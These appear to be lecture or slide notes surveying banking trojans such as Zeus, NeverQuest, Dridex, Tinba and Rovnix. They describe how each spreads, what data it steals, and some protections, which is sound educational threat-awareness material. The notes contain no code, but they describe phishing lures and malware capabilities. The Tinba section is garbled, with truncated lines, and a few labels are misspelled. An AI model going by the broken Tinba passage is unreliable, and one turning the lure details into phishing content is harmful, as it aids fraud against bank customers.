• Man in the browser 

is a security attack where the perpetrator

installs a Trojan horse on a victim's computer that's capable of
modifying that user's Web transactions as they occur in real time
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (logging) the keys struck on a
keyboard, typically covertly, so that person using the keyboard is
unaware that their actions are being monitored. Data can then be
retrieved by the person operating the logging program
• Form grabbing is a form of malware that works by retrieving
authorization and log-in credentials from a web data form before
it is passed over the Internet to a secure server. This allows the
malware to avoid HTTPS encryption
 ZUES
• Trojan horse malware package that runs on versions of Microsoft Windows.
• it is often used to steal banking information by man-in-the-browser 
keystroke logging and form grabbing.
•  Zeus is spread mainly through drive-by downloads and phishing schemes.
• First identified in July 2007 when it was used to steal information from the 
United States Department of Transportation,
• it creates a botnet, which is a network of corrupted machines that are covertly
controlled by a command and control server under the control of the malware's
owner. A botnet allows the owner to collect massive amounts of information or
execute large-scale attacks.
• Zeus also acts as a financial services Trojan designed to steal banking credentials
 from the machines it infects. It accomplishes this through website monitoring
and keylogging, the Trojan can get around the security in place on these websites,
as the keystrokes required for logging in are recorded as the user enters them
• The spam messages often come in the form of email, but
there have been social media campaigns designed to spread
the malware through messages and postings on social media
sites. Once users click on a link in the email or message, they
are directed to a website that automatically installs the
malware..
• Drive-by downloads happen when the hackers are able to
corrupt legitimate websites, inserting their malicious code
into a website that the user trusts. The malware then installs
itself when the user visits the website or when the user
downloads and installs a benign program.
• How to Protect Yourself
• Prevention through safe Internet practices is always the first step in staying safe from the Zeus malware. This
means avoiding potentially dangerous websites, like those offering illegal free software, adult material or illegal
downloads, as the owners of these types of websites often have no problem allowing malware owners to host
their software on the site. Being safe also means not clicking on links in email or social media messages unless
you were expecting the message. Remember: Even if the message is from a trusted source, if that source is
afflicted with Zeus, the message could still be corrupt.
• Staying safe also means being safe when interacting with financial institutions while online. Two-factor
authentication, where the website sends a confirmation code to a mobile device to confirm the login, is a must.
Remember, though, that some offshoots from Zeus have also infected mobile devices, so using this kind of
authentication shouldn't be seen as a cure-all.
• A powerful, updated antivirus solution is a must. These kinds of solutions will not only help protect you from
visiting unsafe websites where you might find the Trojan, but can detect the Trojan when it downloads, tries to
install or tries to run. Additionally, these solutions can scan your system and remove the malware if it already
exists on your machine.
• While there are a number of antivirus solutions out there, including a number that offer a free trial period, it's
important to choose one that's from a leader in the industry that updates their solutions constantly. The fact
that the Zeus source code is public means that there will be no end to the damage that this malware can do,
and every few years you can expect that new versions of the malware will arise. Only a security vendor that is
constantly vigilant against new threats has what it takes to truly protect you from the Zeus Trojan in the future.
 NEVERQUEST
• NeverQuest is a type of malicious software, or malware, known as a banking
Trojan. 
• It can be introduced to victims’ computers through social media websites,
phishing emails, or file transfers.  Once installed on a victim’s computer,
NeverQuest is able to identify when a victim attempted to log onto an online
banking website and transfer the victim’s login credentials – including his or
her username and password – back to a computer server used to administer
the NeverQuest malware.
•   Once surreptitiously installed, NeverQuest enables its administrators
remotely to control a victim’s computer and log into the victim’s online banking
or other financial accounts, transfer money to other accounts, change login
credentials, write online checks, and purchase goods from online vendors.
• HACKER:RUSSIAN
• MOST AFFECTED COUNTRY :GERMANY
• Downloading and running executable files
• Stealing cookie files
• Stealing certificates from the operating system store
• Getting the list of running processes
• Clearing the browser cache folder and deleting cookie files
• Removing copies of malware files
• Starting and stopping a SOCKS proxy server
• Starting and stopping a VNC remote access server
• Downloading and running updates of the malware (with or without restarting the computer)
• Running commands via ShellExecute()
• Deleting Registry entries
• Stealing passwords stored in FTP clients
• Deleting information about copies of the malware from the Registry
• Copying files (specified via pattern mask) from an infected computer
• Viewing the user’s web history
• Secretly recording video and sending recorded video to the cybercriminals’ server
• Getting video files by their number
• Deleting video files by their number
 GOZI
• GOZI is a spyware that monitors network traffic. It
also gets login credentials stored in browsers and
mail applications. It has screen capture and
keylogging functions. It uses a rootkit component to
hide related processes, files and registry information
• Gozi V3 is distributed via spam mails which link to a
malicious file, such as an obfuscated Visual Basic
script, which acts as a dropper component. The
dropper component downloads and executes an
executable with a valid digital signature.
 DRIDEX
• Actors typically distribute Dridex malware through phishing e-mail
spam campaigns. Phishing messages employ a combination of
legitimate business names and domains, professional terminology,
and language implying urgency to persuade victims to activate open
attachments. Sender e-mail addresses can simulate individuals
(name@domain.com), administrative (admin@domain.com,
support@domain.com), or common “do not reply” local parts
(noreply@domain.com). Subject and attachment titles can include
typical terms such as “invoice”, “order”, “scan”, “receipt”, “debit
note”, “itinerary”, and others.
• Recent versions of Dridex exploit vulnerability CVE-2017-0199,
which allows remote execution of code. This vulnerability is specific
to Microsoft Office and WordPad. Microsoft released a patch in 2017
 RAMNIT
• The first Ramnit variants that emerged in 2010
were viruses that infected EXE, DLL and HTML
files found on the computer. Later variants
included the ability to steal confidential data
from the infected machine.
•  At its peak in 2015, Ramnit was estimated to
have infected 3,200,000 PCs [3]. Ramnit infects
removable media such as USB drives and also
hides itself within the master boot record.[4] [5] 
 GOZNYM
• The criminal network used GozNym malware in an attempt to steal an estimated
$100 million from more than 41 000 victims, primarily businesses and their
financial institutions
• Spammers were employed to create and send hundreds of thousands of 
phishing emails. The emails, designed to look like legitimate business
correspondence, encouraged the recipient to click on a malicious link or file
attachment. Word.doc attachments with encrypted VBA macros are, surprisingly,
still an effective technique. If the social engineering trick worked, the victim’s
machine was redirected to a server that dropped the GozNym malware.
• The purpose of the GozNym malware is to capture victims’ banking login
credentials and deliver these to the gang, who would then use the captured
credentials to fraudulently gain access to victims’ accounts. The stolen funds
were then laundered through U.S and other foreign bank accounts controlled by
the criminals.
 TINBA
called Tinba, is a malware program that targets financial institution websites.
man-in-the-browser attacks and network sniffing. Since its discovery, it has been found
jor banking institutions in the United States, including TD Bank, Chase, HSBC, Wells F
ed to steal users' sensitive data, such as account login information and banking codes
ket sniffing, a method of reading network traffic, to determine when a user navigates
unch one of two different actions, depending on the variation. In its most popular for
causing a man-in-the-middle attack. The Trojan uses Form grabbing to grab keystrokes
ba then sends the keystrokes to a Command & Control. This in turn causes a user's inf
Tinba has used is to allow the user to log into the webpage. Once the user is in, the m
act the company's logo and site formatting. It will then create a pop-up page informin
sting additional information, such as social security numbers.[4] Most banking instituti
or this information as a way to defend against these types of attacks. Tinba has been m
gun asking users for the type of information asked as security questions, such as the u
he attacker to use this information to reset the password at a later time.[5]
to other system processes, in an attempt to convert the host machine into a zombie,
maintain connection in the botnet, Tinba is coded with four domains, so if one goes do
an can look for one of the others immediately.[6]
 GOOTKIT
• The Gootkit Banking Trojan was discovered back in 2014, and
utilizes the Node.JS library to perform a range of malicious tasks,
from website injections and password grabbing, all the way up to
video recording and remote VNC capabilities
•  Gootkit's main functions are focused on stealing data from
browsers. It can extract and exfiltrate data such as browsing
history, passwords, and cookie files, and supports extracting this
information from multiple browser types, from Chrome to
Internet Explorer.
• Furthermore, Gootkit can also log what users enter inside web
forms.
• Was earlier used for banking frauds
 QADARS
• Qadars is a sophisticated and dangerous trojan
used for crimeware-related activities including
banking fraud and credential theft. Qadars targets
users through exploit kits and is installed using
Powershell Scripts
• Qadars targeting multiple well-known banks in UK
and Canada and is capable of stealing infected
users' two-factor authentication codes and banking
credentials through the deployment of webinject
 RONVIX
• Rovnix is considered a serious threat to the banking industry, 
• Threat actors used high-quality crafted Japanese-language emails that include
ZIP files containing fake invoices, and the Rovnix, a crimeware kit very popular
in the criminal underground.
• The Zip files seemingly coming from .ru domains (Russia), when victims open
an invoice it triggers the malware’s execution. The malicious code is able
to inject JavaScript into the login form used by 14 Japanese banks. The code is
used by attackers to launch a man-in-the-middle attack while users are trying
to access their bank accounts, the scripts are also able to defeat 
two-factor authentication.
• In some cases, the experts discovered the Rovnix providing instructions for the
victims to download an Android app onto a mobile device. That malicious app
contains the Rovnix component for SMS hijacking which listens for incoming
SMS messages containing transaction authorization codes from the bank.